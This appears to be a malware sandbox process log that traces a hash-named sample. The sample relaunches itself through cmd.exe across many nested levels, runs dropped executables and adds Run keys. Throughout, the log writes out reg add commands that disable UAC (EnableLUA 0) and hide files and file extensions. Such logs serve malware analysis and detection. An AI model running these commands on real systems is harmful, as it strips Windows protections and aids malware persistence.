C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
154⤵
PID:3712

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
155⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
156⤵
PID:1664

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
157⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
158⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
159⤵
PID:3328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
160⤵
PID:1144

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
161⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
162⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
163⤵
PID:4488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
164⤵
PID:1672

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
165⤵
PID:680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
166⤵
PID:3376

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
167⤵
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
168⤵
PID:3808

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
169⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
170⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
171⤵
PID:2552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
172⤵
PID:4048

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
173⤵
PID:2364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
174⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
175⤵
PID:4160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
176⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
177⤵
PID:4676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
178⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
179⤵
PID:4028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
180⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
181⤵
PID:1000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
182⤵
PID:3688

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
183⤵
PID:4184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
184⤵
PID:1548

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
185⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
186⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
187⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
188⤵
PID:2928

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
189⤵
PID:5100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
190⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
191⤵
PID:3620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
192⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
193⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
194⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
195⤵
PID:3108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
196⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
197⤵
PID:1692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
198⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
199⤵
PID:4680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
200⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
201⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
202⤵
PID:2328

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
203⤵
PID:2088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
204⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
205⤵
- Adds Run key to start application
PID:4684

C:\Users\Admin\umcwocEU\xsMYUowA.exe
"C:\Users\Admin\umcwocEU\xsMYUowA.exe"
206⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
206⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
207⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
208⤵
PID:3216

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
209⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
210⤵
PID:4584

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
211⤵
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
212⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
213⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
214⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
215⤵
PID:1548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
216⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
217⤵
PID:3484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cYYUUcgQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
216⤵
PID:1908

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
217⤵
PID:4832

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
216⤵
- UAC bypass
PID:4800

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
216⤵
PID:4780

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
216⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqoMgUwk.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
214⤵
PID:2784

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
215⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
214⤵
- UAC bypass
- Modifies registry key
PID:4236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
214⤵
PID:3656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
214⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
212⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
212⤵
- Modifies registry key
PID:1880

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
212⤵
- UAC bypass
PID:3196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hSQMkIUs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
212⤵
PID:1372

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
213⤵
PID:4404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
210⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OwkogUAo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
210⤵
PID:2704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
211⤵
PID:5100

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
210⤵
- UAC bypass
- Modifies registry key
PID:2384

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
210⤵
PID:4944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zusogksc.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
208⤵
PID:4912

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
209⤵
PID:3736

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
208⤵
- Modifies registry key
PID:4760

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
208⤵
PID:3084

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
208⤵
PID:2416

C:\ProgramData\saEgQgMs\EAwYIQgk.exe
"C:\ProgramData\saEgQgMs\EAwYIQgk.exe"
206⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UGwAQIYU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
206⤵
PID:5012

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
207⤵
PID:3444

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
206⤵
- UAC bypass
- Modifies registry key
PID:668

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
206⤵
PID:4800

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
206⤵
- Modifies visibility of file extensions in Explorer
PID:536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
204⤵
- Modifies visibility of file extensions in Explorer
PID:4776

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
204⤵
PID:2856

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
204⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HmgEYgAs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
204⤵
PID:2172

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
205⤵
PID:4404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
202⤵
- Modifies visibility of file extensions in Explorer
PID:4100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
202⤵
PID:2316

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
202⤵
- UAC bypass
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DsMggcgg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
202⤵
PID:1992

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
203⤵
PID:60

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
200⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GQcQccUM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
200⤵
PID:1364

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
201⤵
PID:3660

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
200⤵
- UAC bypass
PID:3692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
200⤵
PID:1060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
198⤵
- Modifies visibility of file extensions in Explorer
PID:2312

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
198⤵
PID:4976

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
198⤵
- UAC bypass
- Modifies registry key
PID:3212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ngQgEcsc.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
198⤵
PID:4668

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
199⤵
PID:2148

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
196⤵
PID:1100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aMQgEcUY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
196⤵
PID:5044

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
197⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
196⤵
PID:1500

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
196⤵
PID:3132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\caQAcMwg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
194⤵
PID:3316

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
195⤵
PID:116

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
194⤵
- UAC bypass
PID:3896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
194⤵
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
194⤵
- Modifies visibility of file extensions in Explorer
PID:1192

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
192⤵
PID:1000

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
192⤵
- Modifies visibility of file extensions in Explorer
PID:1108

C:\Windows\SysWOW64\reg.exe
